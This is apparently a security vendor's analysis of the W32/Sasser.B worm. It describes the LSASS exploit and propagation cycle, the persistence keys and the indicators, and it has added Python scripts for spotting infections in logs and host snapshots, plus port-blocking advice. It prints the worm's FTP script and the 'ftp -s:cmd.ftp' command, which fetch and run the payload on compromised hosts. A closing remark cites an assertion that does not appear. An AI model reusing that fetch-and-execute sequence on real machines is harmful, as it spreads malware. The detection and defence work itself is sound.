W32/Sasser.B
Analysis
Specifics
This 32-bit virus is a minor variant of W32/Sasser.A-net: it also has a packed file size of 15,872 bytes and was coded in Visual C++. Its only purpose is to spread to other systems across the Internet, as quickly as possible. It does so by exploiting a buffer overflow in the Local Security Authority Subsystem Service (LSASS) [ref: MS04-011 and CAN-2003-0533].
The buffer overrun exists because of an unchecked buffer in the Local Security Authority Subsystem Service. This service is responsible for managing local security, domain authentication, and Active Directory processes. It handles authentication for the client and for the server. It also contains features that are used to support Active Directory utilities.
The virus binds to TCP port 5554 and acts as an FTP server. It then sends SYN packets to random IP addresses across the Internet on destination TCP port 445. Live hosts with that port open answer with a SYN/ACK, and the virus targets each such address with its LSASS exploit code in an effort to gain access to the system. If the target is compromised, the virus writes into the IPC$ share an FTP script file which requests the virus from the infected system; the file is downloaded from TCP port 5554 on the infected system to the target, executed there, and the cycle continues.
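The propagation cycle described above leaves a recognisable footprint in connection logs: one host SYN-sweeping TCP/445, a connection from it to TCP/9996 on a victim, and the victim pulling from TCP/5554 on the sweeper. The Python below is an added example, not code from the original advisory. It runs over a few constructed connection records (the `timestamp src dst dport tcp_flags` format, the hosts and the threshold of five distinct targets are assumptions) and flags sweeping hosts and worm-port traffic, then pairs them into likely infected and likely victim hosts.

```python
"""Flag W32/Sasser.B-style propagation in connection records.

Added example, not code from the original advisory.  The record format
(timestamp src dst dport tcp_flags), the sample hosts and the sweep
threshold are assumptions made for illustration.
"""
import ipaddress
from collections import defaultdict

SWEEP_PORT = 445          # LSASS exploit target
SWEEP_THRESHOLD = 5       # distinct /445 targets before a host counts as a sweeper
WORM_PORTS = {5554: "worm FTP server", 9996: "LSASS exploit shell"}

# Constructed sample, not captured traffic: 10.0.0.7 sweeps six addresses,
# opens a shell on 192.0.2.44 (tcp/9996) and is then pulled from (tcp/5554);
# 10.0.0.12 is an ordinary client talking SMB to one file server.
SAMPLE_LOG = """\
12:00:01 10.0.0.7 203.0.113.4 445 S
12:00:01 10.0.0.7 203.0.113.5 445 S
12:00:01 10.0.0.7 203.0.113.6 445 S
12:00:02 10.0.0.7 198.51.100.9 445 S
12:00:02 10.0.0.7 198.51.100.10 445 S
12:00:02 10.0.0.7 192.0.2.44 445 S
12:00:03 10.0.0.7 192.0.2.44 9996 S
12:00:04 192.0.2.44 10.0.0.7 5554 S
12:00:05 10.0.0.12 10.0.0.3 445 S
12:00:06 10.0.0.12 10.0.0.3 445 S
"""


def parse_record(line):
    """Split one record; ipaddress validates both addresses."""
    ts, src, dst, dport, flags = line.split()
    return ts, str(ipaddress.ip_address(src)), str(ipaddress.ip_address(dst)), int(dport), flags


def find_sweepers(records, threshold=SWEEP_THRESHOLD):
    """Map sweeping source -> number of distinct hosts it SYN'd on tcp/445."""
    targets = defaultdict(set)
    for _ts, src, dst, dport, flags in records:
        if dport == SWEEP_PORT and flags == "S":
            targets[src].add(dst)
    return {src: len(dsts) for src, dsts in targets.items() if len(dsts) >= threshold}


def find_worm_channels(records):
    """All connections to the worm's FTP port or the exploit shell port."""
    return [(src, dst, dport, WORM_PORTS[dport])
            for _ts, src, dst, dport, _flags in records if dport in WORM_PORTS]


def analyse(lines):
    """Correlate sweepers with worm-port traffic into infected/victim roles."""
    records = [parse_record(l) for l in lines if l.strip()]
    sweepers = find_sweepers(records)
    channels = find_worm_channels(records)
    # An infected host sweeps /445 and is later pulled from on /5554;
    # a victim receives the /9996 shell and then does the pulling.
    served_on_5554 = {dst for _s, dst, p, _l in channels if p == 5554}
    shelled_on_9996 = {dst for _s, dst, p, _l in channels if p == 9996}
    return {
        "sweepers": sweepers,
        "channels": channels,
        "likely_infected": set(sweepers) & served_on_5554,
        "likely_victims": shelled_on_9996,
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_LOG.splitlines()).items():
        print(f"{key}: {value}")
```

The sweep count alone is a weak signal (a vulnerability scanner or a domain controller also touches many hosts on 445); the correlation with the 9996 shell and the 5554 pull is what makes the verdict specific to this worm's cycle.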
Loading At Windows Startup
If this virus is run, it copies itself to the Windows folder and registers itself to run at each Windows startup -
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
"avserve2.exe" = C:\WINNT\avserve2.exe
While memory resident, the virus creates two mutexes -
Jobaka3
JumpallsNlsTillt
Virus Delivery Through FTP
On an infected system, the virus may write files with random names in a specific format into the System32 folder, such as these -
98723_up.exe
23712_up.exe
56919_up.exe
The virus binds to TCP port 5554 and uses this channel to run an FTP emulation. It creates the file "c:\win.log" and writes the infected system's IP address into it. If the virus is able to compromise a target, it opens a remote shell on the target on TCP port 9996. It then writes an FTP script file, "cmd.ftp", with the following instructions -
open <IP address of infected system> 5554
anonymous
user
bin
get *_up.exe
bye
The virus remotely executes the FTP script with the command "ftp -s:cmd.ftp". Once the file has been retrieved to the target system it is executed, and the "cmd.ftp" script is deleted.
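The host-side artifacts listed in the sections above (the Run value, the two mutexes, the numbered _up.exe files in System32, c:\win.log and the cmd.ftp script) can be checked mechanically during triage. The Python below is an added example, not code from the advisory. It works on a host snapshot constructed inline rather than on a live system; the snapshot layout, the benign entries placed in it and the one-point-per-indicator score are assumptions, while the indicator values themselves are the ones the advisory gives.

```python
"""Triage a host snapshot for the W32/Sasser.B artifacts the advisory lists.

Added example, not code from the original advisory.  The snapshot layout
(registry Run values, System32 listing, open mutex names, file paths,
cmd.ftp contents) and the scoring are assumptions; gathering a real
snapshot is left to the reader's own tooling.
"""
import re

DROPPER_NAME = "avserve2.exe"                      # Run value from the advisory
MUTEX_NAMES = {"Jobaka3", "JumpallsNlsTillt"}      # mutexes from the advisory
UP_FILE_RE = re.compile(r"^\d+_up\.exe$", re.IGNORECASE)
FTP_PORT = 5554


def check_run_key(run_values):
    """run_values: {value name: data}. Flag entries that launch avserve2.exe."""
    return [(name, data) for name, data in run_values.items()
            if name.lower() == DROPPER_NAME
            or data.lower().endswith("\\" + DROPPER_NAME)]


def find_up_files(system32_listing):
    """Filenames in the <digits>_up.exe format the worm drops."""
    return sorted(f for f in system32_listing if UP_FILE_RE.match(f))


def check_mutexes(open_mutexes):
    """Worm mutex names present on the host."""
    return sorted(MUTEX_NAMES & set(open_mutexes))


def parse_cmd_ftp(text):
    """Return (host, port, files) if the script looks like the worm's
    ('open <ip> 5554' plus a 'get ..._up.exe'), otherwise None."""
    host = port = None
    files = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].lower() == "open":
            host, port = parts[1], int(parts[2])
        elif len(parts) >= 2 and parts[0].lower() == "get":
            files.append(parts[1])
    if port == FTP_PORT and any(f.lower().endswith("_up.exe") for f in files):
        return host, port, files
    return None


def triage(snapshot):
    """Run every check; score is the number of indicator groups that fired."""
    paths = {p.lower() for p in snapshot.get("files", [])}
    findings = {
        "run_key": check_run_key(snapshot.get("run_values", {})),
        "up_files": find_up_files(snapshot.get("system32", [])),
        "mutexes": check_mutexes(snapshot.get("mutexes", [])),
        "win_log": "c:\\win.log" in paths,
        "cmd_ftp": parse_cmd_ftp(snapshot.get("cmd_ftp", "")),
    }
    score = sum(1 for value in findings.values() if value)
    return findings, score


# Constructed snapshots (assumed layout); indicator values are the advisory's.
INFECTED_SNAPSHOT = {
    "run_values": {"avserve2.exe": r"C:\WINNT\avserve2.exe",
                   "ctfmon.exe": r"C:\WINNT\system32\ctfmon.exe"},
    "system32": ["98723_up.exe", "23712_up.exe", "kernel32.dll", "update.exe"],
    "mutexes": ["Jobaka3", "JumpallsNlsTillt", "ShimCacheMutex"],
    "files": [r"C:\win.log", r"C:\WINNT\avserve2.exe"],
    "cmd_ftp": "open 10.0.0.7 5554\nanonymous\nuser\nbin\nget 98723_up.exe\nbye\n",
}
CLEAN_SNAPSHOT = {
    "run_values": {"ctfmon.exe": r"C:\WINNT\system32\ctfmon.exe"},
    "system32": ["kernel32.dll"],
    "mutexes": ["ShimCacheMutex"],
    "files": [],
    "cmd_ftp": "",
}

if __name__ == "__main__":
    for label, snap in (("infected", INFECTED_SNAPSHOT), ("clean", CLEAN_SNAPSHOT)):
        findings, score = triage(snap)
        print(label, score, findings)
```

The cmd.ftp parser deliberately keys on the port and the `_up.exe` suffix rather than on an exact filename, because the number in the name is random per drop; a script that fetches from any other port, as the last assertion below checks, is not counted.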
Recommended Action
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option
- Using the FortiGate manager, block external to internal traffic using UDP ports 135, 137, 138, and 445, and TCP ports 135, 139, 445, 593, 5554 and 9996
- For Windows XP users, implement use of the Personal Firewall - this feature automatically blocks unsolicited inbound traffic and would protect against this Internet worm
- Ensure affected systems are updated with the latest Microsoft security patches, and specifically the update which addresses this vulnerability in MS04-011
Telemetry
Detection Availability
Product | Database
---|---
FortiClient | Extreme
FortiMail | Extreme
FortiSandbox | Extreme
FortiWeb | Extreme
Web Application Firewall | Extreme
FortiIsolator | Extreme
FortiDeceptor | Extreme
FortiEDR |
Version Updates
Date | Version | Detail |
---|---|---|
2023-04-03 | 91.02022 |